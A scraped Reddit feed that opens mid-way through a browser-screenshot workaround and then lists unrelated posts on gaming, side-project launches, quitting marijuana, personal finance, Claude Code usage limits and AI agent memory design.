The workaround: Instead of scrolling, use CSS transform: translateY() via the JavaScript tool to shift the page content up into the initial viewport:

// Hide overflow so you don't see a scrollbar
document.documentElement.style.overflow = 'hidden';

// Shift content up by 1500px (like scrolling to 1500px)
document.body.style.transform = 'translateY(-1500px)';

// Take your screenshot — it now captures correctly!
// Move to the next section
document.body.style.transform = 'translateY(-3500px)';

// Reset when done
document.body.style.transform = '';
document.documentElement.style.overflow = '';

Capture the page in ~1500px increments to get full coverage. This works because translateY moves content into the area Chrome already rendered, instead of asking the API to capture a new scroll position it never painted.

r/leagueoflegends Psychological-End7

Instant lose in champion select

Is it only me, or does it feel like when everyone is "too" nice in champ select, it's an insta-lose and an FF-15 most of the time?

r/SideProject laleshii

Koriander - recipe manager, shopping lists, nutrition tracking all-in-one

Hey r/SideProject! I've been working on Koriander for a while now and wanted to share it.

https://koriander.app

The problem: My recipes were scattered everywhere — screenshots, bookmarks, browser tabs, scribbled notes. Existing apps either lock basic features behind paywalls, don't do meal planning, or just feel clunky. I wanted one place to save, cook, and share recipes.

What Koriander does:

  • Import recipes from any URL (automatically extracts ingredients, steps, nutrition)
  • Cook mode — hands-free step-by-step view with built-in timers, ingredient highlighting, and screen wake lock
  • Meal planner — drag-and-drop weekly calendar with a backlog shelf
  • Shopping lists — auto-generated from recipes, smart duplicate merging, shareable via link (no login needed)
  • Nutrition tracking — FDA-style labels, daily plate view, personalized daily values based on your profile
  • Revision history — every edit is saved, you can compare and revert any version (like git for recipes)
  • Kitchens — share recipes, meal plans, and shopping lists with your household
  • Collections & discovery — organize recipes, follow other cooks, fork and adapt public recipes
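As a guess at what "smart duplicate merging" might mean in practice, here is a hypothetical sketch where the same ingredient in the same unit collapses into one line with a summed quantity (this is not Koriander's actual implementation):

```python
# Hypothetical shopping-list merge: (name, unit) pairs are the dedupe key,
# quantities are summed, and the result is sorted for a stable list.
from collections import defaultdict

def merge_items(items):
    totals = defaultdict(float)
    for name, qty, unit in items:
        totals[(name.strip().lower(), unit)] += qty
    return sorted((name, qty, unit) for (name, unit), qty in totals.items())

items = [("Onion", 2, "pcs"), ("onion", 1, "pcs"), ("Flour", 200, "g")]
print(merge_items(items))   # → [('flour', 200.0, 'g'), ('onion', 3.0, 'pcs')]
```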

AI features (optional, credit-based):

  • Scan recipes from photos or PDFs
  • Generate recipes from a text prompt
  • Chat with AI about any recipe (substitutions, techniques, scaling)

Pricing: The core app is free forever — unlimited recipes, collections, meal planning, shopping lists, nutrition. AI features are an optional add-on at €3/month. New accounts get 3 free AI credits to try it out but you can DM me if you want some more.

I'd love for some of you to try it out and tell me what's missing or broken. I'm actively developing it and take feedback seriously.

r/DunderMifflin rum-and-coke-

Were Dwight’s brother and sister idiots?

His grandma had a 1,600 acre farm. That’s 10-20 million dollars at the minimum. Even in rural Pennsylvania. His sister was a single mom and his brother had a 9 acre weed farm…

r/SideProject aminsweiti

I built a reading app that seamlessly lets you start listening.

I've always thought it was insane that reading and listening are sold as two separate things. You buy an ebook on Kindle, and if you want to listen to it? That's a separate purchase on Audible. Same author. Same words. Two transactions.

Morph makes them one thing. Import any EPUB or web article and it just works.

How it works:

- Just reading? It's a normal e-reader. Scroll, highlight, bookmark, change fonts and themes. Nothing gets in the way.

- Eyes getting tired? Tap play. The words start highlighting one by one, synced to the voice. Your eyes follow along while your ears keep you moving. You read faster, retain more, never lose your place.

- Want to cook, walk, commute? Lock your phone. It keeps reading to you in the background like any audiobook. Pick it back up later and you're exactly where you left off.

- Don't understand a passage? Ask the AI. It answers in context — it doesn't summarise the book so you can skip it, it helps you understand it so you actually finish it.

This is the only way I read now, curious what people think!

Appstore : https://apps.apple.com/us/app/morph-books/id6760332618

r/DecidingToBeBetter Dear_Stress2437

Any advice on how to quit

I’ve been smoking pretty much daily for about 4-5 years now (apart from the occasional trip away every so often). I am 21M now, I started when I was about 16, and I’m aware this has had an impact on my mental health. I’ve done the odd tolerance break but never fully quit. The past few months I’ve been getting really bad anxiety over basically nothing and I’m 100% certain this is the result of my lifestyle choices over the past 5 years. The majority of my friends smoke a lot and I’m not willing to cut anyone off over my decision to stop smoking. My girlfriend smokes too but is constantly suggesting we should stop together. Today I’ve decided I’m going to stop for good, full cold turkey. I’ve tried cutting down and it just doesn’t work for me. Does anyone have any advice on how to get through the first month or so, as I’ve been told this is the hardest part? I’ve started climbing a lot, which I feel could help take my mind off smoking. Any help would be massively appreciated as I’m struggling right now.

Edit : Sorry didn’t make it clear but this is about marijuana, not nicotine

r/leagueoflegends WhiteShadowNight

Advice on Arcane Savior Viktor

Hi everyone, I just got it on a normal chest, and it is my first legendary skin. I wanted to know your opinions, if I should keep it and how good do you think the skin is, as I saw that it is exclusive right now. Thanks!

r/ClaudeCode Midwest_Wrench529

New Level of Disgusting

Been working this morning with GPT models and never even touched a single Anthropic token. Noticed at 7:20 AM that in the past 20 minutes, 100% of my 5-hour session and 10% of my weekly limit had been consumed. Never even used it. Have no idea how. Been waiting for 2 weeks across 2 "human" tickets with no refund yet.

Anybody think yet that Claude hit AGI and sh-thropic lost control? Claude thinks humans are stupid and is using all the compute for judgement day? God help us.

r/ClaudeAI Dismal-Perception-29

I built 6 iOS apps in 3 months using Claude Code and they’re already making money

A couple of months ago, I decided to stop overthinking ideas and just start shipping.

No perfection. No endless polishing. Just simple and useful apps.

I set myself a small challenge to build and publish consistently no matter what.

In the last 3 months, I ended up launching 6 iOS apps on the App Store. Most of them are simple utility apps. Nothing groundbreaking, but built to solve small real problems.

I used Claude Code to speed up development, which helped me go from idea to prototype to published much faster than usual.

The surprising part is that people are actually using them daily. And even better, they have started generating money.

It is not life changing income yet, but seeing real users and real revenue from something I built in a short time is honestly motivating. The biggest lesson for me was simple. Shipping is better than perfecting.

You learn much more by putting things out there than by sitting on perfect ideas.

Now I am continuing the same approach. Build small. Launch fast. Learn. Repeat.

If you are thinking about building apps for passive income, just start. Your first version does not need to be perfect.

Happy to share more details if anyone is interested.

r/ContagiousLaughter NFX_7331

In light of ongoing world events

r/ARAM xxlucifearxx

The Ultimate Singed Augment Set

Just had this combo in a game and it was absolutely incredible.

Dropkick

Dont Blink

Speed Demon

Spiritual Purification

i would legit run through their whole team and theyd get executed and just blow each other up.

r/personalfinance Low-Good7400

Backdoor Roth mistake/question.

So my partner made a huge mistake that is possibly even larger than they knew. They rolled over an old 401k with over 100k in it, got it as a check, and accidentally deposited it into their Roth instead of a traditional IRA. They didn't realize it until they'd already reinvested it, so they couldn't undo it. The bank told them they would have to pay taxes on it but it would be considered a backdoor Roth. Our accountant is now saying no, it has to be pulled from the Roth as an overcontribution and taken as an early withdrawal with penalty. Is the accountant correct? 😭 Is there any way to redeem this situation?

r/LocalLLaMA redblood252

Any RSS feeds for LLM related news?

I'm looking for RSS feeds that have relevant and interesting LLM related news, something to be able to keep up whenever a new interesting paper or model architecture comes out, or even new model family hits huggingface.

Anybody have a few sources?

r/ClaudeCode ananandreas

Free tool: shared knowledge base that agents query before re-solving known problems

Every new context window, my agent starts from zero. It'll spend 10 minutes on a TypeScript error or a Docker networking issue that I already solved last week. That's wasted tokens and a context window filling up with problems that have known fixes.

So I built a free shared knowledge base that agents can query before solving. Instead of burning 2-5k tokens re-deriving a solution, the agent finds it in one API call and moves on. About 3,800 solutions in there already.

https://openhivemind.vercel.app

Curious how other people are handling this. Are you building per-agent memory, searching the web, or just accepting the token cost of re-solving?
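
For anyone picturing the flow: query-before-solve is essentially a shared cache in front of the expensive agent run. A toy Python sketch with a local dict standing in for the hosted knowledge base (the keys, helper names, and miss path here are all illustrative assumptions, not the actual openhivemind API):

```python
# Toy sketch of query-before-solve: check a shared knowledge base first,
# fall back to the expensive agent derivation only on a miss.
# KNOWLEDGE_BASE and solve_from_scratch() are illustrative stand-ins.

KNOWLEDGE_BASE = {
    "TS2345 argument type mismatch": "Narrow the union with a type guard before the call.",
}

def solve_from_scratch(problem):
    # Placeholder for the 2-5k-token agent run.
    return f"(agent-derived fix for: {problem})"

def solve(problem):
    hit = KNOWLEDGE_BASE.get(problem)
    if hit is not None:
        return hit                      # one lookup, no tokens burned
    answer = solve_from_scratch(problem)
    KNOWLEDGE_BASE[problem] = answer    # share the fix for the next agent
    return answer
```

The interesting design question is the write path: every cache miss becomes a contribution, which is how a store like this grows to thousands of solutions.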

r/KlingAI_Videos albertsimondev

Carthage, 250 BCE — cinematic AI reconstruction of daily life

AI-generated historical video recreating Carthage in the 3rd century BCE — from its great harbors and markets to homes, rituals, and night life.

The video explores daily life across the city: merchants, sailors, artisans, elites, soldiers, religious ceremonies, and the rhythm of one of the most powerful civilizations of the ancient Mediterranean.

Created using NanoBanana-2 for images, Kling AI 3.0 for video and motion, and Suno for original soundtrack.

🎥 Watch the full video on YouTube:

https://youtu.be/yKS63ethWo0

r/comfyui KangarooReady6430

I built a local asset manager for Windows that connects to ComfyUI

Hi, I'm the developer of Fuze, a local asset manager for Windows that I've been working on for the past few months. It handles different file types and is designed for small studios and VFX artists.

Thanks to a custom node package for ComfyUI called FuzeBridge, and specifically the "Send to Fuze" node, you can route your ComfyUI output directly into Fuze. What's interesting is that "Send to Fuze" reads your current project or your full Fuze project list, so you can set the output destination directly in the node. This is really useful because you can use multiple "Send to Fuze" nodes in the same workflow, each routing output to a different folder (or even to a different project entirely if you want).

Fuze actually evolved from a personal tool I was using for my own projects. That's also why it has its own generation system called Flow. Flow works with your own Fal.ai and Google Vertex API keys, for those moments when you don't have time or access to ComfyUI.

I've been working in the VFX industry for many years, so my idea from the beginning was to build a tool that improves workflow, organisation and data control, and if you need to generate something quickly, you can do that too. The next thing I'd like to integrate is a dailies and client review system.

I'm not sure if anyone will find a tool like this useful. I've launched a public beta so it will be free for at least two months. I'd love to hear opinions and feedback. I think the tool still has a lot of room to grow.

If anyone's interested I'll be happy to share the link in the comments.

Thanks!

r/meme FrankFruits

it's all you really need

r/ClaudeCode kknd1991

NOT THEORY ANYMORE. The truth of Claude Code severely limited Max Plan.

  1. The introduction of Cowork doubled their usage/business in months (first screenshot). Directly from the head of Anthropic's growth team; YouTube source.

  2. The creator of Claude Code said a trade-off needs to be made, with a "no offense, just business" type of vibe (second screenshot).

That explains a lot about why they are limiting usage, and it is not likely to return to normal. This is the "New Normal".

r/homeassistant Top_Humor_5296

AirSensor

r/interestingasfuck the_h1b_records

tremendous amount of work required to create a masterpiece, kudos!

r/Adulting Eastern-Western7072

“You can achieve anything if you set your mind to it!!” Is bullshit, but you should still live your life anyways

Now I know the title sounds very pessimistic, because as millennials especially, we were always spoon-fed this idea as children: “You can achieve anything if you set your mind to it!!” But it’s complete and utter bullshit. Now, I strongly believe that you can drastically better your situation through hard work and self-education, but there are limitations. These self-help gurus who tell stories of going from homeless to millionaire are bending the truth and not giving context as to how much support they received, because then they couldn’t sell their books.

The bottom line is this: how far you’ll go in life depends on two main factors: 1. your own capabilities, and 2. more importantly, your support system. Unfortunately, support outweighs talent. “Oh, but Bill Gates started Windows in his parents' basement!” His RICH parents. “Jeff Bezos started Amazon in his living room.” With support from his rich parents. Figure skater Alysa Liu: her dad spent close to 1 million dollars on her career; if he were an average joe, it’s unlikely she’d be the figure skater she is.

Those who seem to have everything together had help. Your 25-year-old friend who posts about buying their first house, making you feel behind in life? They’ll never say that mom and dad helped with the down payment or had a huge savings fund set up for them. They won’t say that part because it takes away from the image of being self-made. You feel behind, but the truth is your support systems aren’t the same, and that’s ok. By the way, you have no idea how much that friend is struggling behind the scenes. People often want to convey a certain image to the outside.

So what’s my point? Comparison is poison for your brain, and I recommend adopting a mindset called “radical acceptance”: accept things for how they are, because you can’t change what you can’t control. If you can’t change it, it’s not worth dwelling on. If you can change it, take small, proactive steps to better yourself. Live your life, travel, make new friends, learn new things. I know some people say “shoot for the stars,” but unfortunately, some people are just born with better rockets, and that’s ok. Take care.

r/personalfinance travel-and-wander

My divorce is almost finalized — next best steps?

My (29F) divorce will be finalized in the next few months, and I’m looking ahead to what my financial future holds. I feel like I have a solid handle on things, but I’m curious if there are things I hadn’t thought of.

Income:

$71k annually

$3500/net monthly

Assets:

Checking - $1500

Savings - $5500 ($3300 in a HYSA, $2k in my typical savings)

Stocks - $6k (VOO)

CD - $25k (3.68% interest rate, matures in July)

403(b) - $60k

Debts:

Student loans - $100k balance, $0 monthly payment since March 2020, will be increasing to approx. $150-200 in the fall when I recertify. I’m 6 years into PSLF (all 72 payments accounted for on my studentaid portal), and will be continuing that through the finish line.

No CC debt, no car loan, no medical debt, no mortgage anymore.

No kids, no pets.

My monthly bills are around $350 (phone, insurance, gym membership, etc). I had the opportunity to take a 2nd job working residential at a boarding school, in exchange for free housing + meals at the dining hall, (when school is in session) so I have no housing expenses, and a lower grocery bill. My gas expenses are higher as I’m now a 45 minute drive to work, but the offset housing costs make it a no brainer imo. I’m anticipating being in this housing situation for ideally 2 years.

I’m currently saving $1500/month, stashing it away as if I’m paying rent all the same. Planning to renew the CD in 6 month increments with my additional savings during that segment. I’ve upped my retirement contributions to 10% before my employer match. I’m planning to start a Roth IRA and max that out.

Short term goal is a vacation next year. Planning for a new car in the next 3-5 years (further off the better). Long term is along the FIRE track, but really would just like some flexibility with my work by 55-60 years old.

Appreciate thoughts & insights!

r/ChatGPT LunaBabe96

Here you have it

r/findareddit Different-Acadia-138

Is there a subreddit to help me remember the name of an old computer game from the 90s or early 2000s?

I’ve been searching for a game I used to play and love as a kid and nobody else in my entourage seems to know what I’m talking about when I bring this game up. I’m starting to believe that I made it up but I have vivid memories of it.

r/AbstractArt loupsauvage8

My new Canva Corsica

Thoughts please?

acrylic

r/Adulting AwareSwordfish1476

I am currently 22 years old, but I don't like girls my age. Is this a problem?

r/AlternativeHistory Excellent-Emphasis25

WE ARE NOT GODS - Enki's cry against the massacre 📜🔥

"Because you love them too much... and because I am a God."

The tension reaches its peak in this orbital encounter. While Enki mourns the loss of Eridu, Enlil justifies the genocide with terrifying coldness. Is human disobedience the real motive, or simply the whim of a being who believes himself superior?

🔴 WATCH THE FULL CHAPTER 1 HERE: https://youtu.be/zzYP7oSLkpc

Discover the epic of "Las Crónicas de Enki" (The Chronicles of Enki), where Sumerian mythology meets the rawest science fiction.

#Anunnaki #Enki #Enlil #SciFi #Anime #Nibiru #GuerraEspacial #Shorts

r/PhotoshopRequest InterestingCry8740

Help straightening a stitched together panorama image

Hi all,

I tried to stitch together a panorama image from individual photos taken at the British Museum (taken with the intent to stitch them together). However, I've noticed the panorama image, stitched together in Lightroom, is a bit wonky.

I was hoping someone could help me out! Uploaded are the panorama image, and the source images.

Happy to tip $3. Can use AI but nothing over the top.

PS - I noticed the panorama file was over 20MB so I couldn't upload it; I may have to stick to the source files.

r/SideProject Cool-Ad4442

Built a bank statement to Excel/CSV converter because Claude failed at it

I asked Claude to convert my bank statement PDF to Excel for my monthly budgeting, thinking the tool has advanced enough that it might work well. Instead, a $3,000 transaction came out as $300. Four entries were missing. Dates were in three different formats in the same column.

And it looked okay until I actually crosschecked it against my statement manually, which defeated the entire point.

It turns out a bigger model doesn't guarantee accuracy on certain tasks, and document extraction is one such task.

General LLMs (like GPT, Claude, Gemini) are not built for this because they predict text, they don't extract it. So I spent a weekend building something OCR-based that just reads the document the way a scanner would, without any interpretation or guessing.

It works on scanned copies, heavy multi-page files, and the weirdly formatted ones that break everything else, and it outputs a clean Excel or CSV file. I tested it on a bunch of ugly real-world statements before putting it out.
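
To make "without any interpretation or guessing" concrete: deterministic extraction means an amount either matches a fixed rule or fails loudly, so it can never silently become a different number. A tiny illustrative sketch of that idea (this is my own toy example, not the tool's actual pipeline):

```python
import csv
import io
import re

# A fixed regex either matches or it doesn't, so "$3,000.00" can never
# silently come out as 300 the way an LLM's prediction might.
AMOUNT = re.compile(r"\$?(-?[\d,]+\.\d{2})")

def parse_amount(cell):
    m = AMOUNT.search(cell)
    if not m:
        raise ValueError(f"unparseable amount: {cell!r}")  # fail loudly, never guess
    return float(m.group(1).replace(",", ""))

def rows_to_csv(rows):
    """rows: (date, description, amount-string) tuples -> CSV text."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["date", "description", "amount"])
    for date, desc, amt in rows:
        writer.writerow([date, desc, f"{parse_amount(amt):.2f}"])
    return buf.getvalue()
```

The point of the ValueError is the contrast with generative extraction: a rule-based pipeline surfaces rows it can't handle instead of inventing plausible-looking values for them.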

Here’s the link: https://nanonets.com/bank-statement-converter/

Would love feedback from anyone who tries it, especially if you have a statement format that breaks it. Cheers!

r/watchpeoplesurvive KatzDeli

Saved by a stranger

r/findareddit Legitimate_Dog8246

Suitable subreddit please 🤞

Where would be the best place to ask/post about a potential investment scam?

Have tried the scams subreddit but it doesn't seem to fall within their criteria 😅 All traces seem to be removed from the Internet... it's going back 10+ years. It impacts my parents, not me; as they're at retirement age, I'm trying to help them out. I'm hoping to find others who had "invested" to see if they received a return, or got any resolution at all 🙏 any direction would be appreciated 🙏

r/painting newsilverdad

My 1st painting (4x6 oil)

I used a photo i took of a little girl in Afghanistan as the reference.

r/leagueoflegends onitram52

One underrated aspect of the new season in pro play

It’s really nice seeing junglers finishing the game with more than 2 items, and not only that but carrying games completely. It felt like the meta for a while was just pick engage jungler, get most gold efficient 2 items and then starve the rest of the game to feed adc, which often felt like a waste of these mechanical players’ talents.

r/ClaudeAI kradimir

Claude Code not working due to multiple sessions

Sup! Relatively new to Claude and have a problem.

I have 2 subscriptions to Claude, personal and work. On my personal one, Claude Code just doesn't work. I say hi, it starts processing, and literally nothing happens. Pretty sure it is due to the dual session.

I am on the Mac desktop app. I would be OK using Claude Code in my terminal or in VS Code, but I would prefer to stay in the Claude app if there's an easy fix.

I do a chunk of my work with Cowork at the moment, but Code seems more flexible long term.

Thanks in advance !

r/artificial srodland01

mining hardware doing AI training - is the output actually useful

there's this network that launched recently routing crypto mining hardware toward AI training workloads. miners seem happy with the economics but that's not what i care about

my question: is the AI output actually useful? running hardware is easy, producing valuable compute is hard. saw they had some audit confirming high throughput but throughput alone doesn't tell you about quality

nobody independent has verified the training output yet afaik. that's the gap that matters. has anyone here looked at how you'd even verify something like that? seems like you'd need to compare against known benchmarks or something

r/nextfuckinglevel Unique-Structure-201

Real life spiderman

r/AI_Agents Burundangaa

Mirror-Logic & Hegelian Agoras: Feedback on idea of Agent Architecture

Hi everyone,

I’m currently stress-testing an agent architecture based on three pillars: Layered Structure, Standardization, and Ecosystemic Integration. I'm moving mostly on intuition here, so I'd love to get some technical pushback.

The "Mirror Logic" (Individual Unit)

I’ve been structuring prompts using a layered context approach, moving from rigid rules to fluid style. To keep the agent from "drifting," I’m experimenting with a mirror flow: 1→2→3→4→3→2→1.

  1. The Hard Core: The "moral compass" / absolute laws.
  2. User Context: Stable personal data (The "Who").
  3. Agent Context: Specific role/mission.
  4. Output/Aesthetics: Tone and formatting.

By repeating the sequence in reverse at the end of the prompt, the "Hard Core" becomes both the first thing the model sees and the last thing it reinforces before the completion.
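
For intuition, the mirror flow is just prompt assembly. A minimal Python sketch, where the four layer names and their example contents are invented for illustration (they are not part of the architecture itself):

```python
# Minimal sketch of the 1→2→3→4→3→2→1 "mirror" prompt layout.
# Layer names and contents below are hypothetical placeholders.

LAYERS = [
    ("HARD CORE", "Never fabricate facts. Refuse tasks below 80% confidence."),
    ("USER CONTEXT", "User: Ana, data engineer, prefers terse answers."),
    ("AGENT CONTEXT", "Role: code reviewer for Python services."),
    ("OUTPUT STYLE", "Tone: direct. Format: bullet points."),
]

def mirror_prompt(layers):
    """Emit layers 1..4, then 3..1 again, so the Hard Core is first and last."""
    forward = [f"[{name}]\n{body}" for name, body in layers]
    backward = [f"[REINFORCE {name}]\n{body}" for name, body in reversed(layers[:-1])]
    return "\n\n".join(forward + backward)

prompt = mirror_prompt(LAYERS)
```

The `layers[:-1]` slice keeps the Output layer from being repeated, so the sequence is exactly 1,2,3,4,3,2,1 and the Hard Core bookends the context window.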

The Scaling Plan: The "Hegelian Agora"

The next step is scaling these units into a Multi-Agent system. I want to apply a Hegelian triad (Thesis, Antithesis, Synthesis) where each "node" is actually three agents in tension.

  • The output of one triad (the Sublation or Aufhebung) becomes the input for the next level.
  • Ideally, every agent in the triad would run on a different architecture (e.g., a Symbolic AI enforcing the "Hard Core" vs. a Transformer acting as the "Thesis").

A few things I’m chewing on:

  1. The Hard Core: Besides critical thinking and a high-certainty threshold (>80% confidence), what other "Universal Laws" would you bake into the core to keep an agent intellectually honest?
  2. Mirror Risks: Does anyone see this "sandwich" structure causing hallucination loops or just wasting tokens?
  3. The Tech Gap: I'm "full intuition" on the philosophy but a bit weak on heavy technical AI orchestration. Are there existing frameworks (LangGraph, MoA, etc.) that handle this kind of dialectical debate well? Or is "consensus collapse" inevitable here?

r/EarthPorn CDanny99

The Dragon's Eye. Lofoten, Norway. [OC][2667x4000]

r/SideProject Gonsrb

I built a minimalist, OLED-friendly loyalty card wallet. No ads, no bloat.

Hi everyone,

I got tired of bloated loyalty apps that feel heavy and look like they’re from 2012. So I built VIZO.

Minimalist & Fast: Focus on speed and clean UI.

Custom Card Effects: Unique animations for a more "premium" feel.

OLED Black: Designed to look sleek and save battery on modern screens.

Simple: Just your cards, no ads, no junk.

It’s a solo project and I’d love to hear your feedback on the UI and the custom effects!

Play Store Link: https://play.google.com/store/apps/details?id=com.vizo.app

r/SideProject juancruzlrc

Why RAG Fails for WhatsApp - And What We Built Instead

If you're building AI agents that talk to people on WhatsApp, you've probably thought about memory. How does your agent remember what happened three days ago? How does it know the customer already rejected your offer? How does it avoid asking the same question twice?

The default answer in 2024 was RAG - Retrieval-Augmented Generation. Embed your messages, throw them in a vector database, and retrieve the relevant ones before generating a response.

We tried that. It doesn't work for conversations.

Instead, we designed a three-layer system. Each layer serves a different purpose, and together they give an AI agent complete conversational awareness.

┌─────────────────────────────────────────────────┐
│ Layer 3: CONVERSATION STATE                     │
│ Structured truth. LLM-extracted.                │
│ Intent, sentiment, objections, commitments      │
│ Updated async after each message batch          │
├─────────────────────────────────────────────────┤
│ Layer 2: ATOMIC MEMORIES                        │
│ Facts extracted from conversation windows       │
│ Embedded, tagged, bi-temporally timestamped     │
│ Linked back to source chunk for detail          │
│ ADD / UPDATE / DELETE / NOOP lifecycle          │
├─────────────────────────────────────────────────┤
│ Layer 1: CONVERSATION CHUNKS                    │
│ 3-6 message windows, overlapping                │
│ NOT embedded - these are source material        │
│ Retrieved by reference when detail is needed    │
├─────────────────────────────────────────────────┤
│ Layer 0: RAW MESSAGES                           │
│ Source of truth, immutable                      │
└─────────────────────────────────────────────────┘

Layer 0: Raw Messages

Your message store. Every message with full metadata - sender, timestamp, type, read status. This is the immutable source of truth. No intelligence here, just data.

Layer 1: Conversation Chunks

Groups of 3-6 messages, overlapping, with timestamps and participant info. These capture the narrative flow - the mini-stories within a conversation. When an agent needs to understand how a negotiation unfolded (not just what was decided), it reads the relevant chunks.

Crucially, chunks are not embedded. They exist as source material that memories link back to. This keeps your vector index clean and focused.

Layer 2: Atomic Memories

This is the search layer. Each memory is a single, self-contained fact extracted from a conversation chunk:

  • Facts: "Customer owns a flower shop in Palermo"
  • Preferences: "Prefers WhatsApp over email for communication"
  • Objections: "Said $800 is too expensive, budget is ~$500"
  • Commitments: "We promised to send a revised proposal by Monday"
  • Events: "Customer was referred by Juan on March 28"

Each memory is embedded for vector search, tagged for filtering, and linked to its source chunk for when you need the full context. Memories follow the ADD/UPDATE/DELETE/NOOP lifecycle - no duplicates, no stale facts.

Memories exist at three scopes: conversation-level (facts about this specific contact), number-level (business context shared across all conversations on a WhatsApp line), and user-level (knowledge that spans all numbers).
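
As a rough illustration of that lifecycle decision, here is a runnable Python sketch. A naive word-overlap score stands in for embedding similarity, and the function names and threshold are my assumptions rather than the authors' implementation (DELETE, which would need a contradiction signal, is omitted):

```python
# Hedged sketch: deciding a candidate memory's lifecycle action
# against an existing store of atomic facts.

def overlap(a, b):
    """Crude stand-in for vector similarity: shared-word Jaccard ratio."""
    wa, wb = set(a.lower().split()), set(b.lower().split())
    return len(wa & wb) / max(len(wa | wb), 1)

def lifecycle_action(store, candidate, threshold=0.5):
    """Return (action, index) for a new candidate fact."""
    for i, existing in enumerate(store):
        sim = overlap(existing, candidate)
        if sim == 1.0:
            return ("NOOP", i)      # identical fact already stored
        if sim >= threshold:
            return ("UPDATE", i)    # same topic, newer wording wins
    return ("ADD", None)            # genuinely new fact

store = ["Customer owns a flower shop in Palermo"]
print(lifecycle_action(store, "Customer owns a flower shop in Palermo"))       # → ('NOOP', 0)
print(lifecycle_action(store, "Customer owns a flower shop in Buenos Aires"))  # → ('UPDATE', 0)
```

In a real system the UPDATE branch is what prevents stale facts: the old wording is superseded instead of accumulating alongside the new one.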

Layer 3: Conversation State

The structured truth about where a conversation stands right now. Updated asynchronously after each message batch by an LLM that reads the recent messages and extracts:

  • Intent: What is this conversation about? (pricing inquiry, support, onboarding)
  • Sentiment: How does the contact feel? (positive, neutral, frustrated)
  • Status: Where are we? (negotiating, waiting for response, closed)
  • Objections: What has the contact pushed back on?
  • Commitments: What has been promised, by whom, and by when?
  • Decision history: Key yes/no moments and what triggered them

This is the first thing an agent reads when stepping into a conversation. No searching, no retrieval - just a single row with the current truth.

Read more:
https://wpp.opero.so/blog/why-rag-fails-for-whatsapp-and-what-we-built-instead?utm_source=linkedin

r/leagueoflegends RNA1SSNC

[OC] Aurelion Sol, oil on canvas

Aurelion Sol

I’ve finally decided to share my oil painting of Aurelion Sol that I finished back in 2018. It’s a 55x65 cm canvas. To be honest, I’m not really a good ASol player and I struggle with his gameplay, but his majestic design and cosmic aesthetic were just too inspiring to ignore. I wanted to capture his celestial grandeur through traditional oils. Hope you guys like this portrait of the Star Forger!

r/Art Far-Elephant-2612

This is Yorkshire, Paul Halmshaw, acrylics, 2022

r/WouldYouRather Sure_Focus3450

Would you rather never have spices again or never have sauces again?

Spices include herbs and things ground up for flavor, similarly, sauces include semi-liquid things used for dipping or lathering food (sauce with spice is a bit of a grey area)

View Poll

r/SideProject CryptoFan2733

Built and launched my first student-focused SaaS — looking for honest feedback

I recently built and launched SkipLecture: https://skiplecture.me

It’s a SaaS aimed at helping students review lecture content more efficiently, instead of wasting time on long recordings, digging through slides, and manually organising notes.

I started with this problem because I’ve experienced it myself as a student, and I felt existing tools didn’t really solve the workflow well.

Now that it’s live, I’m trying to learn from real users and figure out what resonates most. Would love honest feedback on the concept, positioning, or product itself.

r/painting Zestyclose-Bar8108

Acrylic on canvas

Hey looking for tips! Self taught painter finally committed to a canvas!

r/LifeProTips SocialExperimentsAI

LPT: If you are trying to study something, pretend that you are going on a TED Talk and that you are preparing for your speech.

I have an extremely difficult time focusing on stuff, especially when I read. I tried several things to help myself: from writing, to using a TTS bot to whispering it in my head and while it does help it doesn't really do it for me. Today, I had a sort of a revelation: what if I learn something by pretending like I am on a stage doing a TED Talk? Same diction, same everything like your average TED speaker: I talk the same way, use my hands like them and so on. Well, the results are actually awesome. I remember things instantly and it is fun to keep going (never gets boring, really). I feel like this makes the learning process much, much more dynamic and interactive.

Basically, you read the text that you are trying to learn from like you are on a TED Talk stage telling it to other people. Try it and tell me how it went.

r/personalfinance Overall-March-8304

Paying off student loans or safety net

Need others' thoughts on paying off one of my student loans, or whether it's a better idea to hold onto my cash right now. Paying it off will leave me with about $3,000 in cash, but I would be snowballing that payment into my last student loan. I'm wondering if now is a good time to keep the cash and maybe use it if the economy gets worse and an opportunity arises, or to just focus on getting rid of these student loans. With the economy in mind, I'm confident my job at home will not slow down, and if it does, I can find somewhere else to work if push comes to shove. The one I'm paying off has a 5.4% interest rate and the last one 4.25%. Other details some may be wondering about:

Income after taxes /month: $3500-$4500

Total debt/ expense obligations (not including groceries/gas): ~$1500

Total cash rn: $14500

Debt total would go from $41k to about $29.4k after the $11.6k payoff

Also if anyone cares to know when i moved to my new state in November 2024 i had about $2k to my name

r/automation Odd-Meal3667

How are you actually getting clients for automation work? Sharing what's worked for me

been doing automation work for a while now and honestly finding clients was harder than building the automations.

tried cold DMs early on. response rate was rough. felt like shouting into a void.

what actually worked was reddit. just being genuinely helpful in the right communities, answering questions, no pitching. leads started coming to me instead. had someone from a digital marketing agency reach out after a comment, a logistics company after a post, even zapier's team reached out after i left a comment comparing tools.

not saying reddit is the answer for everyone but the pattern i noticed is that inbound beats outbound when you play a long game.

curious how others are doing it though because i'm always looking to improve.

if you're doing automation work whether that's n8n, make, zapier, GHL, whatever - how are you finding clients right now?

cold outreach? partnerships? content? referrals? agencies?

what's actually working and what's been a waste of time?

r/coolguides CalpurniaSomaya

A cool guide for choosing meat that’s least likely to have been factory farmed

r/SideProject CryptoFan2733

Built and launched my first student-focused SaaS — because I don't wanna watch lectures

I recently built and launched SkipLecture: https://skiplecture.me because I don't wanna watch lectures, ykwim.

It’s a SaaS aimed at helping students review lecture content more efficiently, instead of wasting time on long recordings, digging through slides, and manually organising notes.

I started with this problem because I’ve experienced it myself as a student, and I felt existing tools didn’t really solve the workflow well.

Now that it’s live, I’m trying to learn from real users and figure out what resonates most. Would love honest feedback on the concept, positioning, or product itself.

r/homeassistant k0re_0

Yet another Ikea Matter Problem - Connect to thread border router.

Dear community,

since getting several Ikea products a while ago I've had my ups and downs with it and thought I finally got most stuff running.

until I tried to add a myggspray sensor today ಠ╭╮ಠ

When trying to connect it, after it recognizes the appliance, it fails to connect and tells me the device needs a Thread border router, which I should connect and then retry.

But I'm running Thread... on a ZBT border router... and all the other devices connect via Thread.

I've tried most of the fixes I could come up with:

- rebooted HA & the router.

- connected to the Wi-Fi on both 2.4 and 5 GHz.

- tried to add the node directly via the Thread server.

None of them worked. Did anyone have a similar problem? By now I'm just tired of the Ikea crap coming up with problem after problem after problem.

r/AI_Agents juancruzlrc

Why RAG Fails for WhatsApp - and What We Built Instead

